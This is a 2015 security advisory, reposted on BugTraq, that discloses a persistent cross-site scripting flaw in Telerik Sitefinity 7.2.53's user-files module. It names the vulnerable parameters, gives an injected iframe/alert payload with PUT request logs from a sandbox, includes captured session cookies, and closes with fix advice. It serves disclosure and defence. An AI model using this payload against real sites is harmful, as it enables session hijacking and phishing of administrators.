BugTraq
Sitefinity Enterprise v7.2.53 - Persistent Vulnerability Jan 13 2015 05:29PM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
Sitefinity Enterprise v7.2.53 - Persistent Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1369

Release Date:
=============
2015-01-06

Vulnerability Laboratory ID (VL-ID):
====================================
1369

Common Vulnerability Scoring System:
====================================
3.7

Product & Service Introduction:
===============================
Usability that Empowers the Business. Empower your business users to get their job done independently and effectively. Powerful Drag & Drop
Authoring, on-page editing and contextual guidance for self-servicing marketing teams. Complete Feature set to create content experiences,
run campaigns and deliver results. Rated #1 in Ease of Use in the Gleanster 2014 WCM Benchmarks. Personalization, content targeting, persona
profiling and segmentation that your team can immediately start using. Integrated Digital Experience Cloud that includes Customer Journey
Analysis, Predictive and Prescriptive Analytics for optimizing every customer experiences. Built-in ecommerce, email marketing, landing page
management and cross-channel delivery tools.

(Copy of the Vendor Homepage: http://www.sitefinity.com/product/overview )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation vulnerability in the official Telerik Sitefinity v7.2.53 Enterprise Edition CMS.

Vulnerability Disclosure Timeline:
==================================
2015-01-06: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Telerik
Product: Sitefinity Enterprise Edition - Content Managemtn System 7.2.53

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
An application-side validation vulnerability has been discovered in the official Telerik Sitefinity v7.2.53 Enterprise Edition CMS.
The vulnerability allows an attacker to inject own script code as payload to the application-side of the vulnerable service function or module.

The vulnerability is located in the `sfItemTitle` and `sf_binderCommand_viewItemsByParent` values of the vulnerable `User Files > Properties` module.
Attackers are able to send special crafted PUT requests with manipulated `sfItemTitle` to the service application to compromise the `./user-files` module.
The execution of the injected script code occurs on the application of the user-files listing module by the manipulated name context field. The attack
vector is persistent on the application-side and the request method to inject is PUT.

The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.7.
Exploitation of the application-side web vulnerability requires a privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.

Request Method(s):
[+] PUT

Vulnerable Module(s):
[+] Settings & Configuration > User Files > Properties

Vulnerable Parameter(s):
[+] sfItemTitle
[+] sf_binderCommand_viewItemsByParent

Affected Module(s):
[+] User File listing & Upload Files (./Administration/User-files)

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers and local privileged application user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Input: Settings & Configuration > User Files
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Admini
stration/User-files#event=showWindow&winId=ctl04_userFilesBackendList_ct
l00_ctl00_itemsGrid_ctl00_ctl00_edit&autoMax=false

Execution: User File listing & Upload Files
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Admini
stration/User-files
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Admini
stration/User-files#event=showWindow&winId=ctl04_userFilesBackendList_ct
l00_ctl00_itemsGrid_ctl00_ctl00_upload&autoMax=false

PoC: ./User-files

</div></td>
</tr>
</tfoot><tbody>
<tr style="visibility: visible; display: table-row;" class="rgRow" id="ctl04_userFilesBackendList_ctl00_ctl00_itemsGrid_ctl00_ctl00_grid_ct
l00__0">
<td class="sfCheckBoxCol"><input id="ctl04_userFilesBackendList_ctl00_ctl00_itemsGrid_ctl00_ctl00_grid_ct
l00_ctl04_ClientSelectColumnSelectCheckBox"
name="ctl04$userFilesBackendList$ctl00$ctl00$itemsGrid$ctl00$ctl00$grid$
ctl00$ctl04$ClientSelectColumnSelectCheckBox" type="checkbox"></td><td class="sfFolderIcn">
<div class="sys-container">
<p><a href="" class="sf_binderCommand_viewItemsByParent">"><[PERSISTENT SCRIPT CODE EXECUTION!];)" <="" "=""><iframe src=a onload=alert("PENTEST") <</a></p>
</iframe></a></p></div>
</td><td class="sfAlbumInfo">
<div class="sys-container"><a href="" class="sf_binderCommand_viewItemsByParent sfItemTitle">"><[PERSISTENT SCRIPT CODE EXECUTION!]") <</a><p>0 items</p><p></p>
</iframe></a></div>
</td><td class="sfActionsWithProgress">
<div class="sys-container">
<div class="cmDiv"><ul class="actionsMenu clickMenu" id="actions0">
<li class="main sfFirst"><a href="" class="sf_binderCommand_upload">Upload files</a></li>
<li class="main sfLast">
<a menu="actions0" href="">Actions</a>
<div style="position: absolute;" class="outerbox inner"><div class="shadowbox1"></div><div class="shadowbox2"></div><div class="shadowbox3"></div><ul class="innerBox">
<li>
<a href="" class="sf_binderCommand_edit">Edit Properties</a>
</li>
<li>
<a href="" class="sf_binderCommand_permissions">Set Permissions</a>
</li>
<li>
<a href="" class="sf_binderCommand_relocateLibrary">Change library URL</a>
</li>
<li>
<a href="" class="sf_binderCommand_transferLibrary">Move to another storage</a>
</li>
</ul></div>

--- PoC Session Logs [PUT] (Sandbox) ---
Status: 200[OK]
PUT http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Servic
es/Content/DocumentLibraryService.svc/00000000-0000-0000-0000-0000000000
00/?
itemType=Telerik.Sitefinity.Libraries.Model.DocumentLibrary&providerName
=SystemLibrariesProvider&managerType=&provider=SystemLibrariesProvider&w
orkflowOperation= Load Flags[LOAD_BACKGROUND ] Grö�e des Inhalts[1942] Mime Type
[application/json]
Request Header:
Host[site16408192010623.srv03.sandbox.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Content-Type[application/json; charset=UTF-8]
Referer
[http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Dialo
g/ContentViewEditDialog?ControlDefinitionName=UserFilesBackend&ViewName=
UserFilesBackendEditView&language=en&provider=SystemLibrariesProvider]
Content-Length[1580]
Cookie[__utma=172034556.525088814.1417720592.1417720592.1417720592.1; __utmb=172034556.15.9.1417720879538; __utmc=172034556;
__utmz=172034556.1417720592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(
none); optimizelySegments=
%7B%22231657604%22%3A%22direct%22%2C%22232100060%22%3A%22ff%22%2C%222315
86836%22%3A%22false%22%7D; optimizelyEndUserId=oeu1417720591980r0.28011022211653314;
optimizelyBuckets=%7B%7D; __CT_Data=gpv=8&apv_43014_www=8; WRUID=0;
_mkto_trk=id:194-TGP-611&token:_mch-localhost:8080-1417720595883-55422; tlrksf=aGXixH2bBlrRA97hnWN5sFB0%2BvJxHVuu2qnpZkS9RYv%2F87XYIvNh2N%2Fjuwd
0kGsFVvqywF1
a3aM3f5iJNpiJkTIo674vbDXIM%2F4%2B7yk9V2byjPPieLbTLbWijZZqwdoCpgmrkgndB8G
2vB
%2FzMHYy1Q%3D%3D; sf-data-intell-subject=42072ebe-ef56-4c95-bb3c-a8a2634661f4;
.ASPXAUTH=95B673ED661D659CFA2B105E95D5ECFB2F4FCC1399E5699CFEC062B2D399DC
752C6205E6B8DB4CA93DBB4C2E5FB23AEF8B3ECD51588FD8111F6E69453C609E399B6900
0
BF2884D1435BCB937BB6EC5667F3943A804FE36A87AE9295EC2DBA53B605E5E37BD22E6D
DB9B521C33687AFCBE4
8E1DB3BCEC875E4061DCBE6F6524B60F1E52007F92C955FA5DDE19A91E1A72CFC9D50B9F
473FD3882D5F777906C8959977DBAEB24F80D4BAA0CD052B1973A4;
SF-TokenId=6e637324-9c93-42b7-ab60-51367d11133e;
FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4...
lnYXpDTjdsdE5Kckc5aFZ3TS9uZ0lrZ1VOSWNvQU5QY1YyVEJQeUR4UGt2VTRWTHllSHJjNT
dSMW9LcXZOMHhPV05
oakpHbTM5Q2JQVzlnMkFOZC9VSit2dk1UZU5uQlhIMG1uNGttVVp2QjF2OEo4cHhSTTZqWlV
NYmNuTGFrN2dITU95NjVpMjhnc1pBREFBQT08L0Nvb2tpZT48L1NlY3VyaXR5Q29udGV4dFR
va2VuPg==;
sf_site=34c08ad3-81d1-4b36-82b5-4610ef8204bc]
Connection[keep-alive]

POST-Daten:
{"Item":{"AllowComments":true,"AllowTrackBacks":null,"ApproveComments":f
alse,"AvailableLanguages":["","en"],
"BlobStorageProvider":"Database","ClientCacheDuration":0,"ClientCachePro
file":"","DateCreated":"\/Date
(1362640264770)\/","DefaultPageId":null,"Description":{"PersistedValue":
"","Value":""},"DownloadSecurityProviderName":null,
"EmailAuthor":false,"EnableClientCache":false,"EnableOutputCache":false,
"ExpirationDate":null,"Id":"7551e10d-
515d-67af-8bab-ff0100a58543","IncludeInSitemap":false,"ItemDefaultUrl":{
"PersistedValue":"/form-files-sf_jobapplication",
"Value":"/form-files-sf_jobapplication"},"LastModifiedBy":"00000000-0000
-0000-0000-
000000000000","MaxItemSize":"0","MaxSize":"0","OriginalContentId":"00000
000-0000-0000-0000-000000000000","OutputCacheDuration":0,"OutputCacheMax
Size":0,
"OutputCacheProfile":null,"OutputSlidingExpiration":false,"Owner":"268f8
745-3b5f-
425f-a206-3731adacea20","ParentId":null,"PostRights":1,"PublicationDate"
:"\/Date(1362640264640)\/","RunningTask":"00000000-0000-0000-0000-000000
000000",
"Status":0,"ThumbnailProfiles":[],"Title":{"PersistedValue":"\"><[PERSIS
TENT SCRIPT CODE INJECTION VULNERABILITY!]") <","Value":"asdasdasd"},"UIStatus":0,
"UrlName":{"PersistedValue":"form-files-sf_jobapplication","Value":"form
-files-
sf_jobapplication"},"UseDefaultSettingsForClientCaching":false,"UseDefau
ltSettingsForOutputCaching":false,"Version":0,"ViewsCount":0,
"Visible":false,"VotesCount":0,"VotesSum":0,"LastModified":"\/Date
(1417721995648)\/"},"ItemType":"Telerik.Sitefinity.Libraries.Model.Docum
entLibrary"}]
Response Header:
Cache-Control[private]
Pragma[no-cache]
Content-Length[1942]
Content-Type[application/json; charset=utf-8]
Expires[0]
Server[Microsoft-IIS/8.5]
Set-Cookie
[FedAuth=77u/PD94bWw... R5Q29udGV4dFRva2VuPg==; path=/; HttpOnly]
X-AspNet-Version[4.0.30319]
X-Powered-By[ASP.NET]
Date[Thu, 04 Dec 2014 19:40:07 GMT]
-
Status: 200[OK]
GET http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Servic
es/Content/DocumentLibraryService.svc/?
managerType=&providerName=&itemType=Telerik.Sitefinity.Libraries.Model.D
ocumentLibrary&provider=SystemLibrariesProvider&sortExpression=LastModif
ied%20DESC&skip=0&take=50
Load Flags[LOAD_BACKGROUND ] Grö�e des Inhalts[5598] Mime Type
[application/json]
Request Header:
Host[site16408192010623.srv03.sandbox.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
SF_UI_CULTURE[en]
Referer
[http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Admin
istration/User-files]
Cookie[__utma=172034556.525088814.1417720592.1417720592.1417720592.1; __utmb=172034556.15.9.1417720879538; __utmc=172034556;
__utmz=172034556.1417720592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(
none); optimizelySegments=%7B%22231657604%22%3A%22direct%22%2C%22232100060%22%3
A%22ff%22%2C%22231586836%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1417720591980r0.28011022211653314; optimizelyBuckets=%7B%7D; __CT_Data=gpv=8&apv_43014_www=8; WRUID=0; _mkto_trk=id:194-TGP-611&token:_mch-localhost:8080-1417720595883-55422;
tlrksf=aGXixH2bBlrRA97hnWN5sFB0%2BvJxHVuu2qnpZkS9RYv%2F87XYIvNh2N%2Fjuwd
0kGsFVvqywF1a3aM3f5iJNpiJkTIo674vbDXIM%2F4%2B7yk9V2byjPPieLbTLbWijZZqwdo
CpgmrkgndB8G2vB%2FzMHYy1Q%3D%3D;
sf-data-intell-subject=42072ebe-ef56-4c95-bb3c-a8a2634661f4; .ASPXAUTH=95B673ED66...a2VuPg==; path=/; HttpOnly]
X-AspNet-Version[4.0.30319]
X-Powered-By[ASP.NET]
Date[Thu, 04 Dec 2014 19:40:07 GMT]
-
Status: 200[OK]
GET http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Admini
stration/[PERSISTENT SCRIPT CODE EXECUTION!]
Load Flags[LOAD_DOCUMENT_URI ] Grö�e des Inhalts[1245] Mime Type[text/html]
Request Header:
Host[site16408192010623.srv03.sandbox.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinit
y/Administration/User-files]
Cookie[__utma=172034556.525088814.1417720592.1417720592.1417720592.1; __utmb=172034556.15.9.1417720879538; __utmc=172034556;
__utmz=172034556.1417720592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(
none); optimizelySegments=%7B
%22231657604%22%3A%22direct%22%2C%22232100060%22%3A%22ff%22%2C%222315868
36%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1417720591980r0.28011022211653314; optimizelyBuckets=%7B%7D; __CT_Data=gpv=8&apv_43014_www=8; WRUID=0;
_mkto_trk=id:194-TGP-611&token:_mch-localhost:8080-1417720595883-55422; tlrksf=aGXixH2bBlrRA97hnWN5sFB0%2BvJxHVuu2qnpZkS9RYv%2
F87XYIvNh2N%2Fjuwd0kGsFVvqywF1a3aM3f5iJNpiJkTIo674vbDXIM%2F4%2B7yk9V2byj
PPieLbTLbWijZZqwdoCpgmrkgndB8G2vB
%2FzMHYy1Q%3D%3D; sf-data-intell-subject=42072ebe-ef56-4c95-bb3c-a8a2634661f4;
.ASPXAUTH=95B673ED661...dFRva2VuPg==; path=/; HttpOnly]
X-Powered-By[ASP.NET]
Date[Thu, 04 Dec 2014 19:40:08 GMT]
Content-Length[1245]

Reference(s):
http://site16408192010623.srv03.sandbox.localhost:8080/
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Admini
stration/
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Servic
es/Content/DocumentLibraryService.svc
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Servic
es/Content/DocumentLibraryService.svc/00000000-0000-0000-0000-0000000000
00/

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction of the vulnerable name input field. Disallow special chars.
Encode and parse the input that runs through the sfItemTitle and sf_binderCommand_viewItemsByParent value to prevent persistent script code executions.
Encode the user-files output listing index module with the vulnerable name value to ensure script code execution is blocked.

Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the backend interface is estimated as medium. (CVSS 3.7)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm (at) evolution-sec (dot) com [email concealed]) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]�

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
PGP KEY: http://www.vulnerability-lab.com/keys/admin (at) vulnerability-lab (dot) com [email concealed]%280x19
8E9928%29.txt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus